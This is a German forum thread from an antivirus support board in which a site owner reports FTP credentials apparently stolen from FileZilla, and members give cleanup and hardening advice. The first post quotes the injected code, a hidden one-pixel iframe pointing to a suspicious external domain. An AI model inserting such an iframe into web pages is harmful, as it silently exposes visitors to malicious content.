Seite 1 von 2 12 LetzteLetzte
Ergebnis 1 bis 10 von 14

Thema: FTP Passwort von FileZilla geklaut

  1. #1
    Neuzugang
    Registriert seit
    Jun 2011
    Beiträge
    5
    Danke / Gefällt mir

    FTP Passwort von FileZilla geklaut

    Hi zusammen,

    bei mir hat sich jemand auf meinem Webserver angemeldet und die index.php am Ende mit folgendem Code ergänzt:

    Code:
    require('./wp-blog-header.php');
    ?<html><body><iframe src="http://jg54ikkhjdc.com/govinda.de/index.php" width="1" height="1" frameborder="0"></iframe></body></html>>
    Der Administrator teilte mit, dass sich jemand mit nur einem Versuch per FTP angemeldet hat und die Datei geändert wurde. Sonst wurde auf dem Server nichts geändert.

    Es liegt somit der Verdacht im Raum, dass das Passwort von meinem Computer aus ausgelesen wurde. Über google fand ich heraus, dass FileZilla das Passwort im Klartext abspeichert.

    Jetzt bin ich auf der Suche nach der Schadsoftware auf meinem Rechner, kann aber nichts finden. Die Zugangsdaten sind weder auf einem anderen Rechner gespeichert, noch wurde von einem anderen Rechner Zugriff genommen. Weitergegeben wurden sie natürlich auch nicht.

    Ich bin auch bereit meinen Rechner neu zu installieren, allerdings kann ich dann ja immer noch nicht sicher sein, dass ich das mit einem Backup wieder aufspiele.

    Vielen Dank für Hilfe!
    Gruß Marcus

    OS: Win7
    FileZilla_3.2.8.1_win32 (hatte noch die alte Version)
    Avast Free 5.1.889; Hintergrunddienst hat nichts erkannt. Kompletter Festplattenscan ebenfalls negativ.
    Spybot Search and Destroy 1.6.2.0; fand nichts
    f-secure-rescue cd gestartet (aktuelle); fand nichts
    a2HiJackFree; Websuche fand nichts "rotes", Auswertung anbei.
    Angehängte Dateien Angehängte Dateien

  2. #2
    Globaler Moderator Avatar von Catweezel
    Registriert seit
    Feb 2006
    Ort
    Berlin
    Beiträge
    2.791
    Danke / Gefällt mir
    kommst du noch an den Webserver ran ?
    Wenn ja, Passwort ändern (aber nirgends speichern)
    Dies möglichst NICHT mit deinem aktuellen Rechner machen !

    Also...., und wenn ich das Logfile sehe, bekomme ich Kopfschmerzen....
    Setze dein Rechner neu auf, aber nicht mit einem jüngeren Backup.
    Am besten wäre ein totale Neuinstallation.

  3. Danke TerraX, Merlin hat sich für diesen Beitrag bedankt
  4. #3
    Neuzugang
    Registriert seit
    Jun 2011
    Beiträge
    5
    Danke / Gefällt mir
    Hallo Catweezel,

    danke für deine Nachricht. Passwörter sind inzwischen alle geändert.

    Das problem mit dem Rechner neu aufsetzen besteht darin, dass ich mangels Erkennbarkeit (zumindest durch die von mir eingesetzte Software) nicht ausschließen kann, dass mein Rechner dann wieder kompromitiert ist. Dann aber möglicherweise noch blödere Sachen gemacht werden, als "nur" die index.php zu ändern.

    Wenn ich den Übeltäter habe und den später auch wieder "finden" würde, bin ich gerne bereit neu zu installieren. Oder meinst du, dass der sich nach einer Neuinstallation einfacher finden lassen würde? Dann besteht natürlich noch die Gefahr, dass ich mir den womoglich erst monate nach dem neu-aufsetzen wieder einfange.

    Dank & Gruß Marcus

  5. #4
    Power Mitglied Avatar von Auggie
    Registriert seit
    Nov 2008
    Ort
    Bremen
    Beiträge
    3.853
    Danke / Gefällt mir
    Ich muß gestehen, das ich im ersten Moment den Satz auf den Lippen hatte "......selbst schuld".

    Aber jetzt mal ans Eingemachte:
    Meine Vermutung geht auch auf Schadsoftware auf Deinem PC, daher würde ich eine Bootzeit-Prüfung von avast! empfehlen sowie, vorzugsweise im Abgesicherten Modus, eine Überprüfung mit einem weiteren On-Demand-Scanner wie MBAM Free, der zusätzlich noch die Registry auf infizierte Einträge überprüft.
    Ein Neuaufsetzen des PCs würde ich vom Ergebnis abhängig machen.
    Die Logs des Servers zeichnen auch die IP auf, da könnte man mal ansetzen und schauen, wo die hinführt.

    Ich vermute mal, das sich jetzt ein Scriptkiddie einen Ast freut, und vor seinen 14-jährigen Klassenkameraden damit prahlt, er hätte eine hochwichtige Internetseite "gehackt".

    Prävention



    • Wenn das PW im Klartext abgespeichert wird, würde ich über einen Wechsel des FTP-Programms nachdenken, oder zumindest eine Passwort-Manager wie Keypass einsetzen, der die PW-Datenbank verschlüsselt speichert.
    • Nächste Vorsichtsmaßnahme ist, eine genaue Rechteüberprüfung der Dateien auf dem Webserver: Die index.php braucht z.B. meist nur Leserechte, Veränderungen sind eher selten. Alle Verzeichnisse, die Konfigurationsdateien enthalten, per htaccess schützen (sofern der Webserver das unterstützt, was oft der Fall ist).
    • Die Seite vorübergehend vom Netz nehmen und im Zweifelsfall die Originaldateien zurück spielen.....da man die Scripte i.d.R.nicht selbst geschrieben hat, wäre eine manuelle Codeanalyse zu aufwändig.
    • Sämtliche Zugangs-Passwörter für die Administration zu Deinem Webspace ändern! Admin-PW der Seite, FTP-Zugang etc.
    Im Grunde kann man diesem "Malheur" auch etwas positives abgewinnen:
    Es ist ein sehr guter Einstiegspunkt, sich grundsätzliche Gedanken zu machen, wie man solche Situationen zukünftig vermeiden kann.
    Ein paar Punkte habe ich ja schon genannt.
    Wie man Webserver bzw. die eigene Internetpräsenz absichern kann, können wir gerne hier diskutieren, denn das würde imho weit über das eigentliche Threadthema hinaus gehen.

    Zurückspielen eines Images ist natürlich nur sinnvoll, wenn man mit Sicherheit weiß, das das Image sauber ist. Da würde ich auch kein Risiko eingehen und eher konventionell per Hand aufsetzen und vor dem Zurückspielen der eigenen Daten den Datenträger überprüfen.
    Geändert von Auggie (06.06.11 um 16:13 Uhr)
    Die größte Sicherheitslücke sitzt vor dem Monitor!
    avast! 6 Anleitung (PDF-Version)
    avast! 5 Anleitung (PDF-Version)
    Wir haben jetzt Usergruppen eingerichtet. Hier geht es direkt zu den Usergruppen.
    Allgemeine Fragen rund um Smartphone und Tablet werden hier diskutiert.

  6. Danke TerraX, Merlin, KillVirus hat sich für diesen Beitrag bedankt
  7. #5
    Neuzugang
    Registriert seit
    Jun 2011
    Beiträge
    5
    Danke / Gefällt mir
    Hallo zusammen,

    ich danke für die Beiträge. Kann es sein, dass bei Win7 64 die Boot-Prüfung nicht geht? Ich finde jedenfalls die entsprechende Funktion nicht. Google gab mir diesen etwas älteren Beitrag von gerd88: Bei Win7 64 klappt das mit der Bootzeit Prüfung noch nicht.

    Mich würde interessieren, was Auggie mit "selber schuld" meinte. Deine Präventionsvorschläge zielen bis auf das Klartext beim FTP-Client alle auf die Absicherung des Webservers ab. Wenn mein Client aber mit einem Trojaner oder sowas bezogen ist, dann ist es auch relativ egal, ob das PW in Klartext abgespeichert wird oder wie der Webserver selbst abgesichert ist.
    Immerhin könnte auch ein root-PW abgefangen werden. (Ich erlaube mir darauf hinzuweisen, dass ich die Seiten des Webservers nur mit Inhalt fülle)

    Meine Frage zielt darauf ab, wie ich meinen lokalen Rechner testen kann, dass ich die Ursache für den FTP-PW-klau finde. Und wir ich in Zukunft vermeiden kann mir dass ich mir etwas schädliches einfange, was mit meinen bisherigen genutzten Mitteln nicht aufgespürt wird, aber erheblichen Schaden anrichten kann.

    Dank & Gruß Marcus

  8. #6
    AVADAS GmbH
    Registriert seit
    Sep 2007
    Beiträge
    17.355
    Danke / Gefällt mir
    Hallo,

    Zitat Zitat von KillVirus Beitrag anzeigen
    Meine Frage zielt darauf ab, wie ich meinen lokalen Rechner testen kann, dass ich die Ursache für den FTP-PW-klau finde. Und wir ich in Zukunft vermeiden kann mir dass ich mir etwas schädliches einfange, was mit meinen bisherigen genutzten Mitteln nicht aufgespürt wird, aber erheblichen Schaden anrichten kann.
    wenn du dir aktuelle Tests von Virenwächtern anschaust, dann ist dir sicher auch schonmal aufgefallen, dass keiner von diesen eine Erkennungsrate von 100% ausweist, daher können wir dir auch nicht die Frage beantworten, wie du es in Zukunft vermeiden kannst. Welche Vorsichtsmassnahmen du ausführen kannst, hat Auggie ja schon in Stickpunkten aufgeschrieben.

    Das Problem mit FileZilla ist übrigens schon länger bekannt: http://www.abakus-internet-marketing...c/t-93299.html

    Ich persönlich lege daher nur noch Server im Server-Manager von FileZilla an, stelle jedoch die Art der Verbindung auf "Passwort nachfragen". Im Prinzip kannst du deinen PC jetzt nur mit avast! und einem zweiten On-Demand-Scanner prüfen. Die Bootzeitprüfung funktioniert übrigens in neueren avast! Version einwandfrei, in avast! 5 hingegen gab es sie noch nicht. Das ist aber wieder ein Punkt, dem man Beachtung schenken muss, um solchen Problemen vorzubeugen: Die Programme aktuell halten. Dazu zählt auch der Virenscanner, der im Moment in Version 6 verfügbar ist.
    Aktuelles Avast Release: Version Avast 19.8.2393 verfügbar!

  9. Danke TerraX, KillVirus hat sich für diesen Beitrag bedankt
  10. #7
    Globaler Moderator Avatar von TerraX
    Registriert seit
    Feb 2010
    Ort
    Baden-Württemberg
    Beiträge
    3.374
    Danke / Gefällt mir
    Zitat Zitat von KillVirus Beitrag anzeigen
    ich danke für die Beiträge. Kann es sein, dass bei Win7 64 die Boot-Prüfung nicht geht? Ich finde jedenfalls die entsprechende Funktion nicht.
    Hallo,

    das funktioniert auch unter einem 64bit System, mit avast!6.....unter Computer überprüfen.
    Auch bitte daran denken das es für Win7 schon das SP1 gibt.
    WIN 7 64bit / AVAST Premium Security / MBAM Free / Firefox ESR [NS/uBO] / Thunderbird / AOS/ASB

  11. Danke KillVirus hat sich für diesen Beitrag bedankt
  12. #8
    Power Mitglied Avatar von Auggie
    Registriert seit
    Nov 2008
    Ort
    Bremen
    Beiträge
    3.853
    Danke / Gefällt mir
    Zumindest mit der aktuellen Version von avast! funktioniert die Bootzeit-Prüfung problemlos unter x64, das sogar schon mit der 5er-Version (wurde glaub ich mit Version 5.1 umgesetzt).

    Da ich gefragt worden bin: Normalerweise hat die index.php keine vollständigen Dateirechte sondern kann nur gelesen werden; hier wären statt 755 die Rechte 655 oder 640 angesagt.
    Die Veränderung kann auf 2 Wegen erfolgen: Der Webserver wird direkt angegriffen, das würde sofort auffallen.
    Oder sie erfolgte mit Hilfe Deines Systems. Dafür spricht, das keine Brute Force Attacke auf den FTP stattgefunden hat. Bei dieser Option wäre das PW ausgelesen worden und direkt per FTP die Datei geändert worden.
    Alternative wäre noch, das eine zweite Person als FTP-Nutzer eingerichtet ist und dessen System kompromittiert wurde.

    Wie Du solche Situationen vermeiden kannst, habe ich ja geschrieben. Das sind Sachen, die auch jemand umsetzen kann, der keinen Admin-Zugriff auf den eigentlichen Webserver, auf dem Seite liegt, umsetzen.
    Für einen Angreifer hast Du aber einen "normalen" Webserver, auch wenn dieser nur virtuell ist. Wie weit sich das konfigurierten lässt, ist aus den Tarifbeschreibungen ersichtlich.
    Ich kann Dir nur, aus eigener Erfahrung, einen Rat geben:
    Beschäftige Dich mit der von Dir auf dem Webserver eingesetzten Software (Blogsoftware etc.), halte die aktuell und informiere Dich, welche Möglichkeiten der Absicherung Du sonst noch hast.
    Das verhindert keine Angriffe, setzt aber die Schwelle eines erfolgreichen Angriffes höher.
    Eine Internetseite macht man nicht nebenbei! Neben der Inhaltsbeschaffung ist vor allem die Administration zeitaufwändig.
    Die Verantwortung für Deine Seite hast Du allein.

    Ich habe hier dieses Thema mal aufgegriffen, daher bitte in diesem Thread keine Fragen dazu stellen sondern den entsprechenden Thread der Usergruppe nutzen: http://forum.avadas.de/group.php?dis...=49&do=discuss
    Geändert von Auggie (06.06.11 um 23:01 Uhr)
    Die größte Sicherheitslücke sitzt vor dem Monitor!
    avast! 6 Anleitung (PDF-Version)
    avast! 5 Anleitung (PDF-Version)
    Wir haben jetzt Usergruppen eingerichtet. Hier geht es direkt zu den Usergruppen.
    Allgemeine Fragen rund um Smartphone und Tablet werden hier diskutiert.

  13. Danke TerraX, Merlin hat sich für diesen Beitrag bedankt
  14. #9
    Neuzugang
    Registriert seit
    Jun 2011
    Beiträge
    5
    Danke / Gefällt mir
    Hi zusammen,

    danke für die Antworten.
    Avast! habe ich aktualisiert und Boot-Scan gemacht. Gefunden hat er lediglich in meinem Download-Verzeichnis:

    \tightvnc-1.3.10-setup.exe|>{app}\vncHooks.dll ist infiziert von win32up-gen [PUP]

    Ich vermute das ist aber nur die Warnmeldung für ein potentiell unerwünschtes Programm? Jedenfalls hatte ich tightvnc selbst installiert. Wird aber nur bei Bedarf gestartet. Die Downloaddatei habe ich jetzt mit Avast! gelöscht.

    Ansonsten hat er nichts gefunden.

    Dann habe ich im abgesicherten Modus von Emnisoft Anti Malware drüberlaufen lassen.

    Er hat einige follow Cockies gefunden und
    Trace.Registry.VNC.CommonComponents!A2

    Auch hier gehe ich davon aus, dass es sich nur um mein VNC handelt.

    Habe jetzt mal von C't die aktuelle Desinfect CD bestellt.

    Das sich ein anderer FTP-User Zugang zu dem Webspace hatte oder nehmen kann schließt der Admin aus. Weitere Zugänge für den Bereich existieren nicht. Zudem gibt das Logfile eindeutig meinen Login her, der auf Anhieb geklappt hat.

    Gibt es weitere Ideen?

    Dank & Gruß Marcus

  15. Danke Auggie hat sich für diesen Beitrag bedankt
  16. #10
    AVADAS GmbH
    Registriert seit
    Sep 2007
    Beiträge
    17.355
    Danke / Gefällt mir
    Hallo,

    es kann gut sein, dass der Code in die index.php nicht durch einen geklauten Login, sondern durch eine Verwundbarkeit in Wordpress, PHP oder Apache eingeschleusst wurde. In dem Fall ist dann dein Admin gefragt, sich die Sache mal genauer anzuschauen, eventuell ist sogar der ganze Server komprommitiert. Gerade Wordpress ist ein Kandidat, der in der Vergangenheit immer wieder durch Sicherheitslücken aufgefallen ist. In einen Linuxdistributionen wird deshalb vor dem Einsatz dieser Software gewarnt.

    Wenn sowohl avast! als auch Emisoft nichts findet (mit der Vermutung hinsichtlich VNC liegst du richtig), dann sollte dein Rechner sauber sein.
    Aktuelles Avast Release: Version Avast 19.8.2393 verfügbar!

  17. Danke KillVirus, Auggie hat sich für diesen Beitrag bedankt

Ähnliche Themen

  1. Gelöst Master Passwort
    Von Federkathy im Forum Avast Passwörter
    Antworten: 7
    Letzter Beitrag: 21.01.13, 22:27
  2. Gelöst Passwort Vergessen
    Von master_zwerg im Forum Avast 5.x
    Antworten: 3
    Letzter Beitrag: 10.08.10, 15:32
  3. Geschlossen Passwort vergessen
    Von Ulibaerchen im Forum Avast 4.x
    Antworten: 11
    Letzter Beitrag: 29.06.09, 16:29
  4. Geschlossen Passwort-Zugriff auf avast!-geschützen PC???
    Von Tonmeister im Forum Avast 4.x
    Antworten: 0
    Letzter Beitrag: 17.02.07, 22:38
  5. Geschlossen Passwort vergessen
    Von Eulenspiegel im Forum Avast 4.x
    Antworten: 2
    Letzter Beitrag: 03.10.06, 14:08

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •